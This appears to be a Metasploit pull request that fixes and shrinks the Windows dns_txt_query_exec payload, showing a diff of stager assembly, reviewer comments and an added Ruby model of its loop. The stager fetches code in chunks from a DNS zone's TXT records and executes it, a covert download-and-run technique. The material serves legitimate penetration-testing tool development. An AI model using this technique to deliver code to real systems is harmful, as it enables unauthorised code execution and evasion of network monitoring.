Improved payload dns_txt_query_exec #1057

Merged: 16 commits, 3 participants

@corelanc0d3r

Fixed a possible payload crash on XP and Win7.
(did not test if patch works on other OSes)

Made payload a few bytes smaller

To test, feel free to run the setup at corelan.eu:

./msfpayload windows/dns_txt_query_exec DNSZONE=corelan.eu C

(you should get a messagebox)
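The stager this PR patches, as the diff further down shows, asks for TXT records a.<DNSZONE>, b.<DNSZONE>, c.<DNSZONE> and so on (the label byte starts at 0x61 and is incremented each round), appends each answer to a buffer, and stops when a query fails or when the returned record does not carry exactly one string (the patched check on the dword at offset 0x18). The following Ruby model of that loop is an added example, not code from the Metasploit module or from its author; the in-memory zone hash standing in for a DNS server, the 255-byte chunking, the record hash shape and the stop at label 'z' are this example's assumptions, not the module's wire format.

```ruby
# Added example, not Metasploit code: a Ruby model of the fetch loop in
# windows/dns_txt_query_exec as visible in this PR's diff. The stager
# queries a.<zone>, b.<zone>, ... , appends each answer to a buffer, and
# stops when a query fails or when the first returned DNS_RECORD does not
# hold exactly one string (the dword at +0x18 must be 1); then it runs the
# buffer.
#
# The "zone" is an in-memory hash standing in for a DNS server, and the
# answer shape mirrors only the fields the stager inspects. The 255-byte
# chunking is this example's assumption, not the module's wire format.

CHUNK = 255  # longest single <character-string> in TXT RDATA (RFC 1035)

# Server side: lay a payload out as sequential single-string TXT records.
# Returns { "a.<zone>" => { strings: [piece] }, "b.<zone>" => ..., ... }.
def build_zone(zone, payload)
  zone_data = {}
  payload.b.scan(/.{1,#{CHUNK}}/m).each_with_index do |piece, i|
    raise 'payload needs more than 26 pieces; single-letter labels exhausted' if i > 25
    zone_data["#{(0x61 + i).chr}.#{zone}"] = { strings: [piece] }
  end
  zone_data
end

# Client side: `resolve` returns nil when the query fails (eax != 0 after
# the DnsQuery call in the shellcode) or a record hash whose :strings array
# plays the role of Data.TXT (its length is dwStringCount).
def fetch_payload(zone, resolve)
  buf = ''.b
  label = 'a'
  loop do
    rec = resolve.call("#{label}.#{zone}")
    break if rec.nil?                      # query failed -> jump_to_payload
    break unless rec[:strings].length == 1 # dwStringCount != 1 -> prepare_payload
    buf << rec[:strings][0]
    label = label.succ
    break if label.length > 1              # past 'z': bound added in this model
  end
  buf
end
```

Both stop conditions lead to running whatever has been collected so far, which is why a zone with a gap, or with a record that carries two strings, yields a truncated payload rather than an error; that is the behaviour a server-side generator has to respect (one string per record, no gaps in the a, b, c sequence).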

@corelanc0d3r

tested on Win2003 R2 SP2 as well, works fine

@ChrisJohnRiley

Is this an extension of what we were working on in April? If so, just let me know if you want the server-side delivery code.

@corelanc0d3r

this is a bugfix to the existing module (which simply downloads payload) - the modules we worked on in April allow us to download an executable... Maybe it's time to review those modules again & see what needs to be done to make them work reliably

@ChrisJohnRiley

Ok, sorry, didn't want to hijack the thread... let's chat offline and get the ball rolling again!

... and we return you to your regularly scheduled programming

@corelanc0d3r

what? is it evening already? :)

@wchen-r7
Collaborator

Tested ok on Windows 7 SP1.

@wchen-r7 wchen-r7 merged commit 0bf92b5 into rapid7:master
Commits on Oct 24, 2012
  1. @corelanc0d3r: merge
Commits on Oct 29, 2012
  1. @corelanc0d3r
Commits on Oct 30, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Oct 31, 2012
  1. @corelanc0d3r
Commits on Nov 3, 2012
  1. @corelanc0d3r
Commits on Nov 6, 2012
  1. @corelanc0d3r
Commits on Nov 7, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r: restored original file
Commits on Nov 8, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Nov 9, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Nov 12, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
  3. @corelanc0d3r
Showing with 7 additions and 7 deletions.
modules/payloads/singles/windows/dns_txt_query_exec.rb (+7 −7, 14 lines changed)
@@ -160,7 +160,7 @@ def generate
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
- jmp next_mod ; Process this module
+ jmp.i8 next_mod ; Process this module
; actual routine
start:
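Review bot: the `.i8` suffix on this jmp (and on the three others in this PR) forces a rel8 encoding, so the target must stay within -128..+127 bytes of the instruction; that is where the "few bytes smaller" from the description comes from, but it is a constraint every future edit to this routine inherits, since anything inserted between `next_mod` and this jump can push it out of range. The routine is also interpolated with `#{bufferreg}`, and some instructions encode shorter when that register is eax (e.g. `xchg eax,edx` is a one-byte opcode), so a generate-and-size check should be run for every register the module can pick, not just the one used in the corelan.eu test.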
@@ -195,7 +195,7 @@ def generate
mov bl,0x61 ; first query, start with 'a'
dnsquery:
- jmp get_dnsname ; get dnsname
+ jmp.i8 get_dnsname ; get dnsname
get_dnsname_return:
pop eax ; get ptr to dnsname (lpstrName)
@@ -215,7 +215,7 @@ def generate
call ebp ;
test eax, eax ; query ok ?
jnz jump_to_payload ; no, jump to payload
- jmp get_query_result ; eax = 0 : a piece returned, fetch it
+ jmp.i8 get_query_result ; eax = 0 : a piece returned, fetch it
get_dnsname:
@@ -225,9 +225,9 @@ def generate
get_query_result:
xchg #{bufferreg},edx ; save start of heap
pop #{bufferreg} ; heap structure containing DNS results
- mov eax,[#{bufferreg}] ; if first dword has a non-null value, then stop
- test eax,eax
- jnz prepare_payload ; jmp to payload
+ mov eax,[#{bufferreg}+0x18] ; check if value at offset 0x18 is 0x1
+ cmp eax,1
+ jne prepare_payload ; jmp to payload
add #{bufferreg},#{wTypeOffset} ; get ptr to ptr to DNS reply
mov #{bufferreg},[#{bufferreg}] ; get ptr to DNS reply
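Review bot: the new check reads the dword at `#{bufferreg}+0x18` and the comment only says "check if value at offset 0x18 is 0x1"; name the field. In a 32-bit DNS_RECORD that offset is the start of the Data union, and for a TXT answer it is `Data.TXT.dwStringCount`, so `cmp eax,1` means "exactly one character-string in the record". Two things to document next to it: a TXT record carrying more than one string is now treated as end of payload (the zone must use one string per record), and nothing in the visible code checks `wType` against DNS_TYPE_TEXT before reading offset 0x18 as TXT data, so a non-TXT first record would be read through the wrong union member. The removed lines tested the first dword, i.e. `pNext`, and stopped whenever more than one record came back; a one-line comment on why that caused the crash mentioned in the description would help the next reader. Minor: `#{wTypeOffset}` is used here to reach the pointer to the reply data, which does not match its name.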
@@ -243,7 +243,7 @@ def generate
push edi ;
inc ebx ; increment sequence
xchg #{bufferreg},edx ; restore start of heap
- jmp dnsquery ; try to get the next piece, if any
+ jmp.i8 dnsquery ; try to get the next piece, if any
prepare_payload:
mov #{bufferreg},edx
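Review bot: the sequence label is `bl`, started at 0x61 ('a') and bumped with `inc ebx` each round, and nothing in the visible code bounds it, so after the 26th record the next query would be for `{.<DNSZONE>`. Either document a hard limit of 26 records per zone (and size the payload to be delivered accordingly) or end the loop when `bl` passes 'z', since the jump to `dnsquery` here is unconditional.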